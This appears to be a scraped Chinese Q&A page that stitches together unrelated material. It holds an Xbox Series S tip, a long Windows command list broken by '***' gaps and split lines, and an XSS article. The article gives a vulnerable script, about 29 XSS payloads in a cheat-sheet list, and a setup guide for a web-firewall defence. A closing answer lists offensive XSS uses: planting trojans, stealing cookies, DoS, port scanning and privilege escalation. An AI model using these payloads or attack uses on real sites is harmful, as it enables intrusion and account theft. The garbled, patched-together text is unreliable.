本文目录一览:
xss每次进xgp都很慢
每次进xgp都很慢。有多种原因, *** 原因或者服务设置问题。
可以试试其hosts editor工具在里面搜索Xbox下载相关 然后改一下host 重启相关服务就好。
xss概念:完全值得的次世代主机 xbox series s (简称xss) 可以说是次世代更便宜的主机,微软也号称这是一款完完全全的次世代主机。
黑客攻击
gpedit.msc-----组策略 sndrec32-------录音机
Nslookup-------IP地址侦测器 explorer-------打开资源管理器
logoff---------注销命令 tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组 services.msc---本地服务设置
oobe/msoobe /a----检查XP是否激活 notepad--------打开记事本
cleanmgr-------垃圾整理 net start messenger----开始信使服务
compmgmt.msc---计算机管理 net stop messenger-----停止信使服务
conf-----------启动netmeeting dvdplay--------DVD播放器
charmap--------启动字符映射表 diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器 dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk磁盘检查 devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dll文件运行 drwtsn32------ 系统医生
rononce -p ----15秒关机 dxdiag---------检查DirectX信息
regedt32-------注册表编辑器 Msconfig.exe---系统配置实用程序
rsop.msc-------组策略结果集 mem.exe--------显示内存使用情况
regedit.exe----注册表 winchat--------XP自带局域网聊天
progman--------程序管理器 winmsd---------系统信息
perfmon.msc----计算机性能监测程序 winver---------检查Windows版本
sfc /scannow-----扫描错误并复原 winipcfg-------IP配置
taskmgr-----任务管理器(2000/xp/2003) command--------cmd
f *** gmt.msc 共享文件夹 netstat -an----查看端口
osk 屏幕键盘 install.asp----修改注册网页
eventvwr.msc 时间查看器
secpol.msc 本地安全设置
services.msc 服务
2K
accwiz.exe 辅助工具向导
acsetups.exe acs setup dcom server executable
actmovie.exe 直接显示安装工具
append.exe 允许程序打开制定目录中的数据
arp.exe 显示和更改计算机的ip与硬件物理地址的对应列表
at.exe 计划运行任务
atmadm.exe 调用管理器统计
attrib.exe 显示和更改文件和文件夹属性
autochk.exe 检测修复文件系统
autoconv.exe 在启动过程中自动转化系统
autofmt.exe 在启动过程中格式化进程
autolfn.exe 使用长文件名格式
bootok.exe boot acceptance application for registry
bootvrfy.exe 通报启动成功
cacls.exe 显示和编辑acl
calc.exe 计算器
cdplayer.exe cd播放器
change.exe 与终端服务器相关的查询
charmap.exe 字符映射表
chglogon.exe 启动或停用会话记录
chgport.exe 改变端口(终端服务)
chgusr.exe 改变用户(终端服务)
chkdsk.exe 磁盘检测程序
chkntfs.exe 磁盘检测程序
cidaemon.exe 组成ci文档服务
cipher.exe 在ntfs上显示或改变加密的文件或目录
cisvc.exe 索引内容
ckcnv.exe 变换cookie
cleanmgr.exe 磁盘清理
cliconfg.exe sql客户 *** 工具
clipbrd.exe 剪贴簿查看器
clipsrv.exe 运行clipboard服务
clspack.exe 建立系统文件列表清单
cluster.exe 显示域的集群
_cmd_.exe 没什么好说的!
cmdl32.exe 自动下载连接管理
cmmgr32.exe 连接管理器
cmmon32.exe 连接管理器监视
cmstp.exe 连接管理器配置文件安装程序
comclust.exe 集群
comp.exe 比较两个文件和文件集的内容*
compact.exe 显示或改变ntfs分区上文件的压缩状态
conime.exe ime控制台
control.exe 控制面板
convert.exe 转换文件系统到ntfs
convlog.exe 转换iis曰志文件格式到ncsa格式
cprofile.exe 转换显示模式
cscript.exe 较本宿主版本
csrss.exe 客户服务器runtime进程
csvde.exe 曰至格式转换程序
dbgtrace.exe 和terminal server相关
dcomcnfg.exe dcom配置属性
dcphelp.exe ?
dcpromo.exe ad安装向导
ddeshare.exe dde共享
ddmprxy.exe
debug.exe 就是debug啦!
dfrgfat.exe fat分区磁盘碎片整理程序
dfrgntfs.exe ntfs分区磁盘碎片整理程序
dfs_cmd_.exe 配置一个dfs树
dfsinit.exe 分布式文件系统初始化
dfssvc.exe 分布式文件系统服务器
diantz.exe *** cab文件
diskperf.exe 磁盘性能计数器
dllhost.exe 所有com+应用软件的主进程
dllhst3g.exe
dmadmin.exe 磁盘管理服务
dmremote.exe 磁盘管理服务的一部分
dns.exe dns applications dns
doskey.exe 命令行创建宏
dosx.exe dos扩展
dplaysvr.exe 直接运行帮助
drwatson.exe 华生医生错误检测
drwtsn32.exe 华生医生显示和配置管理
dtcsetup.exe installs mdtc
dvdplay.exe dvd播放
dxdiag.exe direct-x诊断工具
edlin.exe 命令行的文本编辑器(历史悠久啊!)
edlin.exe 命令行的文本编辑器(历史悠久啊!)
esentutl.exe ms数据库工具
eudcedit.exe type造字程序
eventvwr.exe 事件查看器
evnt_cmd_.exe event to trap translator; configuration tool
evntwin.exe event to trap translator setup
exe2bin.exe 转换exe文件到二进制
expand.exe 解压缩
extrac32.exe 解cab工具
fastopen.exe 快速访问在内存中的硬盘文件
faxcover.exe 传真封面编辑
faxqueue.exe 显示传真队列
faxsend.exe 发送传真向导
faxsvc.exe 启动传真服务
fc.exe 比较两个文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一个用户并显示出统计结果
fixmapi.exe 修复mapi文件
flattemp.exe 允许或者禁用临时文件目录
fontview.exe 显示字体文件中的字体
forcedos.exe forces a file to start in dos mode. 强制文件在dos模式下运行
freecell.exe popular windows game 空当接龙
file transfer protocol used to transfer files over a network conne
ction 就是ftp了
gdi.exe graphic device interface 图形界面驱动
grovel.exe
grpconv.exe program manager group convertor 转换程序管理员组
help.exe displays help for windows 2000 commands 显示帮助
hostname.exe display hostname for machine. 显示机器的hostname
ie4uinit.exe ie5 user install tool ie5用户安装工具
ieshwiz.exe customize folder wizard 自定义文件夹向导
iexpress.exe create and setup packages for install 穿件安装包
iisreset.exe restart iis admin service 重启iis服务
internat.exe keyboard language indicator applet 键盘语言指示器
ipconfig.exe windows 2000 ip configuration. 察看ip配置
ipsecmon.exe ip security monitor ip安全监视器
ipxroute.exe ipx routing and source routing control program ipx路由和源路由
控制程序
ir setup ftp for wireless communication 无线连接
i *** serv.exe intersite messaging service 安装或者删除service control manage
r中的服务
jdbgmgr.exe microsoft debugger for java 4 java4的调试器
jetconv.exe convert a jet engine database 转换jet engine数据库
jetpack.exe compact jet database. 压缩jet数据库
jview.exe command-line loader for java java的命令行装载者
krnl386.exe core component for windows 2000 2000的核心组件
label.exe change label for drives 改变驱动器的卷标
lcwiz.exe license compliance wizard for local or remote systems. 许可证符合
向导
ldifde.exe ldif cmd line manager ldif目录交换命令行管理
licmgr.exe terminal server license manager 终端服务许可协议管理
lights.exe display connection status lights 显示连接状况
ll *** gr.exe windows 2000 license manager 2000许可协议管理
llssrv.exe start the license server 启动许可协议服务器
lnkstub.exe
locator.exe rpc locator 远程定位
lodctr.exe load perfmon counters 调用性能计数
logoff.exe log current user off. 注销用户
lpq.exe displays status of a remote lpd queue 显示远端的lpd打印队列的状态,
显示被送到基于unix的服务器的打印任务
lpr.exe send a print job to a network printer. 重定向打印任务到 *** 中的打印
机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。
lsass.exe lsa executable and server dll 运行lsa和server的dll
lserver.exe specifies the new dns domain for the default server 指定默认se
rver新的dns域
os2.exe an os/2 warp server (os2 /o) os/2
os2srv.exe an os/2 warp server os/2
os2ss.exe an os/2 warp server os/2
osk.exe on screen keyboard 屏幕键盘
packager.exe windows 2000 packager manager 对象包装程序
pathping.exe combination of ping and tracert 包含ping和tracert的程序
pax.exe is a posix program and path names used as arguments must be specif
ied in posix format. use "//c/users/default" instead of "c:usersdefault."
启动便携式存档互换 (pax) 实用程序
pentnt.exe used to check the pentium for the floating point division error
. 检查pentium的浮点错误
perfmon.exe starts windows performance monitor 性能监视器
ping.exe packet internet groper 验证与远程计算机的连接
posix.exe used for backward compatibility with unix 用于兼容unix
print.exe cmd line used to print files 打印文本文件或显示打印队列的内容。
progman.exe program manager 程序管理器
proquota.exe profile quota program
psxss.exe posix subsystem application posix子系统应用程序
qappsrv.exe displays the available application terminal servers on the net
work
在 *** 上显示终端服务器可用的程序
qprocess.exe display information about processes local or remote 在本地或远
程显示进程的信息(需终端服务)
query.exe query termserver user process and sessions 查询进程和对话
quser.exe display information about a user logged on 显示用户登陆的信息(需
终端服务)
qwinsta.exe display information about terminal sessions. 显示终端服务的信息
rasadmin.exe start the remote access admin service 启动远程访问服务
rasautou.exe creates a ras connection 建立一个ras连接
rasdial.exe dial a connection 拨号连接
ras.exe starts a ras connection 运行ras连接
rcp.exe copies a file from and to a rcp service. 在 windows 2000 计算机和运
行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe rdpclip allows you to copy and paste files between a terminal
session and client console session. 再终端和本地复制和粘贴文件
recover.exe recovers readable information from a bad or defective disk 从坏
的或有缺陷的磁盘中恢复可读取的信息。
redir.exe starts the redirector service 运行重定向服务
regedt32.exe 32-bit register service 32位注册服务
regini.exe modify registry permissions from within a script 用脚本修改注册
许可
register.exe register a program so it can have special execution character
istics. 注册包含特殊运行字符的程序
regsvc.exe
regsvr32.exe registers and unregister"s dll"s. as to how and where it regi
ster"s them i dont know. 注册和反注册dll
regtrace.exe options to tune debug options for applications failing to dum
p trace statements
trace 设置
regwiz.exe registration wizard 注册向导
remrras.exe
replace.exe replace files 用源目录中的同名文件替换目标目录中的文件。
reset.exe reset an active section 重置活动部分
rexec.exe runs commands on remote hosts running the rexec service. 在运行
rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机
上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。
risetup.exe starts the remote installation service wizard. 运行远程安装向导
服务
route.exe display or edit the current routing tables. 控制 *** 路由表
routemon.exe no longer supported 不再支持了!
router.exe router software that runs either on a dedicated dos or on an os
/2 system. route软件在 dos或者是os/2系统
rsh.exe runs commands on remote hosts running the rsh service 在运行 rsh 服
务的远程计算机上运行命令
r *** .exe mounts and configures remote system media 配置远程系统媒体
rsnotify.exe remote storage notification recall 远程存储通知回显
rsvp.exe resource reservation protocol 源预约协议
runas.exe run a program as another user 允许用户用其他权限运行指定的工具和
程序
rundll32.exe launches a 32-bit dll program 启动32位dll程序
runonce.exe causes a program to run during startup 运行程序再开始菜单中
rwinsta.exe reset the session subsystem hardware and software to known ini
tial values 重置会话子系统硬件和软件到最初的值
savedump.exe does not write to e:winntuser.dmp 不写入user.dmp中
scardsvr.exe *** art card resource management server 子能卡资源管理服务器
schupgr.exe it will read the schema update files (.ldf files) and upgrade
the schema. (part of adsi) 读取计划更新文件和更新计划
secedit.exe starts security editor help 自动安全性配置管理
services.exe controls all the services 控制所有服务
sethc.exe set high contrast - changes colours and display mode logoff to s
et it back to normal 设置高对比
setreg.exe shows the software publishing state key values 显示软件发布的国
家语言
setup.exe gui box prompts you to goto control panel to configure system co
mponents 安装程序(转到控制面板)
setver.exe set version for files 设置 ms-dos 子系统向程序报告的 ms-dos 版本
号
sfc.exe system file checker test and check system files for integrity 系统
文件检查
sfmprint.exe print services for macintosh 打印macintosh服务
sfmpsexe.exe
sfmsvc.exe
shadow.exe monitor another terminal services session. 监控另外一台中端服务
器会话
share.exe windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与
ms-dos 文件兼容
shmgrate.exe
shrpubw.exe create and share folders 建立和共享文件夹
sigverif.exe file signature verification 文件签名验证
skeys.exe serial keys utility 序列号 *** 工具
*** logsvc.exe performance logs and alerts 性能曰志和警报
*** ss.exe
sndrec32.exe starts the windows sound recorder 录音机
sndvol32.exe display the current volume information 显示声音控制信息
snmp.exe simple network management protocol used for network mangement 简单
*** 管理协议
snmptrap.exe utility used with snmp snmp工具
sol.exe windows solitaire game 纸牌
sort.exe compares files and folders 读取输入、排序数据并将结果写到屏幕、文
哪有放XSS跨站脚本工具的第三方工具/
不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击
网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。
网站遭受XSS跨站式脚本攻击的基本原理
1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
其攻击过程如下所示:
A给B发送一个恶意构造了Web的URL。
B点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。
具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。
2反射式漏洞,这种漏洞和本地利用漏洞有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
其攻击过程如下:
A经常浏览某个网站,此网站为B所拥有。B的站点运行A使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。
C发现B的站点包含反射性的XSS漏洞。
C编写一个利用漏洞的URL,并将其冒充为来自B的邮件发送给A。
A在登录到B的站点后,浏览C提供的URL。
嵌入到URL中的恶意脚本在A的浏览器中执行,就像它直接来自B的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在A完全不知情的情况下将这些信息发送到C的Web站点。
3存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
其攻击过程如下:
B拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
C注意到B的站点具有存储式的XXS漏洞。
C发布一个热点信息,吸引其它用户纷纷阅读。
B或者是任何的其他人如A浏览该信息,其会话cookies或者其它信息将被C盗走。
类型A直接威胁用户个体,而类型B和存储式漏洞所威胁的对象都是企业级Web应用。
网站遭受XSS跨站式脚本攻击的基本方式
1. DOM-based cross-site scripting
页面本身包含一些DOM对象的操作,如果未对输入的参数进行处理,可能会导致执行恶意脚本。如下面一些DOM操作:
document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
举个例子,假如某个脆弱的页面的代码如下:
HTML
TITLEWelcome!/TITLE
Hi
SCRIPT
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
/SCRIPT
BR
Welcome to our system
…
/HTML
攻击者使用如下的URL访问时,则非常危险:
;scriptalert(document.cookie)/script
试了一下,貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码,阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊,比如把上面的页面修改一下,安全性就增强了不少:
SCRIPT
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]$/))
{
document.write(name);
}
else
{
window.alert("Security error");
}
/SCRIPT
2. Reflected cross-site scripting
也被称为None-Persistent cross-site scripting,即,非持久化的XSS攻击,是我们通常所说的,也是最常用,使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL,当 URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接菜能引起。
3. Persistent cross-site scripting
持久化XSS攻击,指的是恶意脚本代码被存储进被攻击的数据库,当其他用户正常浏览网页时,站点从数据库中读取了非法用户存入非法数据,恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。
实施方式
我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:
1. input type="text" class="9302-9141-0bea-9343 Seach" name="w" value="XXX" /
OK,可以开始做文章了,我们将XXX替换为:abc"/scriptalert('haha')/scripta href=",返回的HTML代码如下:
1. input type="text" class="9141-0bea-9343-69b2 Seach" name="w" value="abc"/
2. scriptalert('haha')/script!--" /
这样,scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为:
1. IMG SRC="javascript:alert('XSS');"
2. IMG SRC=javascript:alert('XSS')
3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"
4. IMG SRC="jav ascript:alert('XSS');"
5. SCRIPT/XSS SRC=""/SCRIPT
6. SCRIPTalert("XSS");///SCRIPT
7. iframe src=
8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"
9. BODY BACKGROUND="javascript:alert('XSS')"
10. BODY ONLOAD=alert(document.cookie)
11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")
12. IMG DYNSRC="javascript:alert('XSS')"
13. IMG DYNSRC="javascript:alert('XSS')"
14. BR SIZE="{alert('XSS')}"
15. IMG SRC='vbscript:msgbox("XSS")'
16. TABLE BACKGROUND="javascript:alert('XSS')"
17. DIV STYLE="width: expression(alert('XSS'));"
18. DIV STYLE="background-image: url(javascript:alert('XSS'))"
19. STYLE TYPE="text/javascript"alert('XSS');/STYLE
20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE
21. ?='SCRIPTalert("XSS")/SCRIPT'?
22. A HREF="javascript:document.location=''"XSS/A
23. IMG SRC=javascript:alert('XSS')
24. EMBED SRC="" AllowScriptAccess="always"/EMBED
25. a="get";
26. b="URL(""";
27. c="javascript:";
28. d="alert('XSS');"")";
29. eval(a+b+c+d);
总结一下,要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些javascript关键字和一些敏感的字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用encode编码。
用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。
准备工作:先去下载最新的IISUTM版本。
根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。
安装完成,通过浏览器访问IISUTM的配置管理界面默认的是,这个是私有地址,只能在该服务器 *** 问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。
登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防XSS攻击”链接。
开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库,你可以根据你网站的情况进行更改(更好不要修改)。
确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。
利用最近热门的Xss漏洞能做什么?
1、针对性挂马 所以这类网站一定是游戏网站,银行网站或者是关于qq、taobao或者影响力相当大的网站等,它们必须有我们平常需要盗取的帐号密码;当然也或许是这个站点的浏览量相当高,我们能将更多的马挂出去。 而如果仅仅是平平常常的一个小站点的XSS漏洞,如果我们要挂马,那么莫不如就直接把木马页面地址贴出去。 2、用户权限下操作 这类网站则必须有会员了,而且这些会员有很多有意义的操作或者有我们需要的内部个人资料,所以我们可以通过XSS对已登录访问者进行有权限操作。我认为cookies的盗取应该算作这一项,因为其目的也是获取用户操作权限(盗密码包括在内),从而获取用户某些信息或者进行权限下的相关操作。 3、Dos攻击或傀儡机 这同样需要一个访问量非常大的站点,利用小站点莫不如我们自己攻击或获取信息。我们可以通过此页的访问用户不间断地攻击其他站点,或者进行局域网扫描等等。这类js工具早已经产生,js端口扫描、jikto、xssshell等等。 4、提权 一般这主要发生在论坛或信息管理系统,总之一定要有管理员了。这需要攻击者对目标系统相当熟悉(一般这样的系统需要开源代码),从而知道怎样构造语句进行提权。 5、实现特殊效果 譬如Monyer在百度空间的插入视频,插入版块;譬如一些人在新浪博客或者校内网实现的特殊效果等等。 结论: 从而你应该了解到这些网站应该具有的性质: 极高的访问量,有会员,有管理员,有具有价值的帐号密码,或者有意义进行特殊效果的实现。 如果你读过《Ajax Hacking with XSS》,你应该知道XSS至少包含input XSS和textarea XSS等七种方式。 其中url XSS属于input XSS,这些漏洞大部分属于保留式的XSS,而textarea XSS等一般属于不保留XSS。 这意味着正常访问一个页面是不会触发保留式的XSS的,尽管这是大部分网站具有的漏洞,其中搜索部分又称搜索式XSS漏洞。 所以当你获取了一个input XSS,你仅仅alert出一个小框框。你跟别人大吹大擂,你发现了一个漏洞,并且你可以alert一个框框给他看,但是事实上你什么都做不了。即使你能挂些小木马,那也是很没意义的事情——因为你莫不如直接在自己的虚拟主机里做XSS页面发给别人。 这个跟sql注入不同,XSS毕竟是客户端的东西。sql注入的目的往往是为了得到目标系统的权限,并且sql语句本身执行的就是服务端的指令;但 XSS一般却是为了获得客户端的东西,执行的也是客户端的指令。所以他们可以“'”一下“出错了”而大喊,你却不能因为“alert”出了“xss窗口” 而乱叫。
求采纳
